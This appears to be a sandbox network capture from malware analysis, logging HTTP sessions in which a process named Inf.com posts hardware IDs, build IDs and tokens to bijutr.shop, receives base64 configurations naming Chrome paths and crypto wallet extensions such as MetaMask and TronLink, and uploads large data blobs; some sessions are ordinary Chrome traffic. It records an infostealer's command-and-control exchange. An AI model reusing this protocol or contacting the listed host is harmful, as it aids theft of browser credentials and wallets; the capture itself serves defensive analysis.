                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: bijutr.shop
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
2024-12-27 06:00:43 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:00:42 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
2024-12-27 06:00:43 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49762 | 188.245.216.205 | 443 | 1276 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:00:44 UTC | 323 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----U3E3EC2VAAAIEUKFK6XB
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: bijutr.shop
                                                                                                                                                                                                                                                                                                  Content-Length: 256
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
2024-12-27 06:00:44 UTC | 256 | OUT | Data Ascii:
------U3E3EC2VAAAIEUKFK6XB
Content-Disposition: form-data; name="hwid"

AEFB981AA1CD3935430149-a33c7340-61ca
------U3E3EC2VAAAIEUKFK6XB
Content-Disposition: form-data; name="build_id"

7860569445207f1198f3127a2e0d4a29
------U3E3EC2VAAAIEUKFK6XB--
2024-12-27 06:00:45 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:00:45 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
2024-12-27 06:00:45 UTC | 69 | IN
                                                                                                                                                                                                                                                                                                  Data Ascii: 3a1|1|1|1|a9d26c542187b1bd8ffa28120f0b3b8a|1|0|1|1|0|50000|00


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49768 | 188.245.216.205 | 443 | 1276 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:00:47 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----OHL68YCT00ZMYMG4OHVK
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:00:47 UTC | 331 | OUT
                                                                                                                                                                                                                                                                                                  Data Ascii: ------OHL68YCT00ZMYMG4OHVKContent-Disposition: form-data; name="token"a9d26c542187b1bd8ffa28120f0b3b8a------OHL68YCT00ZMYMG4OHVKContent-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------OHL68YCT00ZMYMG4OHVKCont
2024-12-27 06:00:48 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:00:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-27 06:00:48 UTC | 2192 | IN
                                                                                                                                                                                                                                                                                                  Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49774 | 188.245.216.205 | 443 | 1276 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:00:49 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----6FCB1VS0ZU37YM79ZUS0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:00:49 UTC | 331 | OUT
                                                                                                                                                                                                                                                                                                  Data Ascii: ------6FCB1VS0ZU37YM79ZUS0Content-Disposition: form-data; name="token"a9d26c542187b1bd8ffa28120f0b3b8a------6FCB1VS0ZU37YM79ZUS0Content-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------6FCB1VS0ZU37YM79ZUS0Cont
2024-12-27 06:00:50 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:00:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-27 06:00:50 UTC | 5837 | IN
                                                                                                                                                                                                                                                                                                  Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49780 | 188.245.216.205 | 443 | 1276 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:00:51 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----CJMY5FC2NGVAIM790ZUS
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 332
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:00:51 UTC | 332 | OUT
                                                                                                                                                                                                                                                                                                  Data Ascii: ------CJMY5FC2NGVAIM790ZUSContent-Disposition: form-data; name="token"a9d26c542187b1bd8ffa28120f0b3b8a------CJMY5FC2NGVAIM790ZUSContent-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------CJMY5FC2NGVAIM790ZUSCont
2024-12-27 06:00:53 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:00:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-27 06:00:53 UTC | 119 | IN
                                                                                                                                                                                                                                                                                                  Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49786 | 188.245.216.205 | 443 | 1276 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:00:54 UTC | 324 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----CT00ZMYUSJMYM7QI5FKN
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 7877
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:00:54 UTC | 7877 | OUT
                                                                                                                                                                                                                                                                                                  Data Ascii: ------CT00ZMYUSJMYM7QI5FKNContent-Disposition: form-data; name="token"a9d26c542187b1bd8ffa28120f0b3b8a------CT00ZMYUSJMYM7QI5FKNContent-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------CT00ZMYUSJMYM7QI5FKNCont
2024-12-27 06:00:55 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:00:55 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
2024-12-27 06:00:55 UTC | 12 | IN | Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49789 | 188.245.216.205 | 443 | 1276 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:00:55 UTC | 323 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----MO8GVA1VKF37YU3OPP8G
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: bijutr.shop
                                                                                                                                                                                                                                                                                                  Content-Length: 489
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
2024-12-27 06:00:55 UTC | 489 | OUT | Data Ascii: ------MO8GVA1VKF37YU3OPP8GContent-Disposition: form-data; name="token"a9d26c542187b1bd8ffa28120f0b3b8a------MO8GVA1VKF37YU3OPP8GContent-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------MO8GVA1VKF37YU3OPP8GCont
2024-12-27 06:00:56 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:00:56 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
2024-12-27 06:00:56 UTC | 12 | IN | Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49802 | 142.250.181.68 | 443 | 4404 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:00:58 UTC | 615 | OUT | GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
2024-12-27 06:00:59 UTC | 1266 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:00:59 GMT
                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                  Expires: -1
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                  Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-poTNlGtMHk0UIeJlPlTHvw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                                  Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                                  Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                                  Server: gws
                                                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
2024-12-27 06:00:59 UTC | 124 | IN | Data Ascii: cac)]}'["",["episode 12 danmachi season 5","epic games store free games","interest rates mortgages","victor wembanyama","
2024-12-27 06:00:59 UTC | 1390 | IN | Data Ascii: aurora borealis northern lights forecast","universal studios rip ride rockit","nintendo switch 2 console","honda nissan merger talks"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmc
2024-12-27 06:00:59 UTC | 347 | IN | Data Ascii: 10002},{"zl":10002}],"google:suggesteventid":5837378844924044668,"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]]
2024-12-27 06:00:59 UTC | 5 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 49805 | 142.250.181.68 | 443 | 4404 | C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:00:59 UTC | 518 | OUT | GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
Host: www.google.com
Connection: keep-alive
X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-12-27 06:01:00 UTC | 1018 | IN | HTTP/1.1 200 OK
Version: 705503573
Content-Type: application/json; charset=UTF-8
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
Accept-CH: Sec-CH-Prefers-Color-Scheme
Accept-CH: Sec-CH-UA-Form-Factors
Accept-CH: Sec-CH-UA-Platform
Accept-CH: Sec-CH-UA-Platform-Version
Accept-CH: Sec-CH-UA-Full-Version
Accept-CH: Sec-CH-UA-Arch
Accept-CH: Sec-CH-UA-Model
Accept-CH: Sec-CH-UA-Bitness
Accept-CH: Sec-CH-UA-Full-Version-List
Accept-CH: Sec-CH-UA-WoW64
Permissions-Policy: unload=()
Content-Disposition: attachment; filename="f.txt"
Date: Fri, 27 Dec 2024 06:01:00 GMT
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 49804 | 142.250.181.68 | 443 | 4404 | C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:00:59 UTC | 353 | OUT | GET /async/newtab_promos HTTP/1.1
Host: www.google.com
Connection: keep-alive
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:00 UTC933INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Version: 705503573
                                                                                                                                                                                                                                                                                                  Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                                  Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                                  Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:01:00 GMT
                                                                                                                                                                                                                                                                                                  Server: gws
                                                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:00 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                                                                                                  Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 49827 | 188.245.216.205 | 443 | 1276 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:01:03 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----379R1D2DTRQIEU37YU3O
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 505
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:01:03 UTC | 505 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 33 37 39 52 31 44 32 44 54 52 51 49 45 55 33 37 59 55 33 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 64 32 36 63 35 34 32 31 38 37 62 31 62 64 38 66 66 61 32 38 31 32 30 66 30 62 33 62 38 61 0d 0a 2d 2d 2d 2d 2d 2d 33 37 39 52 31 44 32 44 54 52 51 49 45 55 33 37 59 55 33 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 38 36 30 35 36 39 34 34 35 32 30 37 66 31 31 39 38 66 33 31 32 37 61 32 65 30 64 34 61 32 39 0d 0a 2d 2d 2d 2d 2d 2d 33 37 39 52 31 44 32 44 54 52 51 49 45 55 33 37 59 55 33 4f 0d 0a 43 6f 6e 74
Data Ascii: ------379R1D2DTRQIEU37YU3OContent-Disposition: form-data; name="token"a9d26c542187b1bd8ffa28120f0b3b8a------379R1D2DTRQIEU37YU3OContent-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------379R1D2DTRQIEU37YU3OCont
2024-12-27 06:01:04 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:01:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-27 06:01:04 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.5 | 49833 | 188.245.216.205 | 443 | 1276 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:01:05 UTC | 326 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----BS0R9RQ9Z58QIEKFCB1N
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 213453
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:01:05 UTC | 16355 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 42 53 30 52 39 52 51 39 5a 35 38 51 49 45 4b 46 43 42 31 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 64 32 36 63 35 34 32 31 38 37 62 31 62 64 38 66 66 61 32 38 31 32 30 66 30 62 33 62 38 61 0d 0a 2d 2d 2d 2d 2d 2d 42 53 30 52 39 52 51 39 5a 35 38 51 49 45 4b 46 43 42 31 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 38 36 30 35 36 39 34 34 35 32 30 37 66 31 31 39 38 66 33 31 32 37 61 32 65 30 64 34 61 32 39 0d 0a 2d 2d 2d 2d 2d 2d 42 53 30 52 39 52 51 39 5a 35 38 51 49 45 4b 46 43 42 31 4e 0d 0a 43 6f 6e 74
Data Ascii: ------BS0R9RQ9Z58QIEKFCB1NContent-Disposition: form-data; name="token"a9d26c542187b1bd8ffa28120f0b3b8a------BS0R9RQ9Z58QIEKFCB1NContent-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------BS0R9RQ9Z58QIEKFCB1NCont
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:05 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:05 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
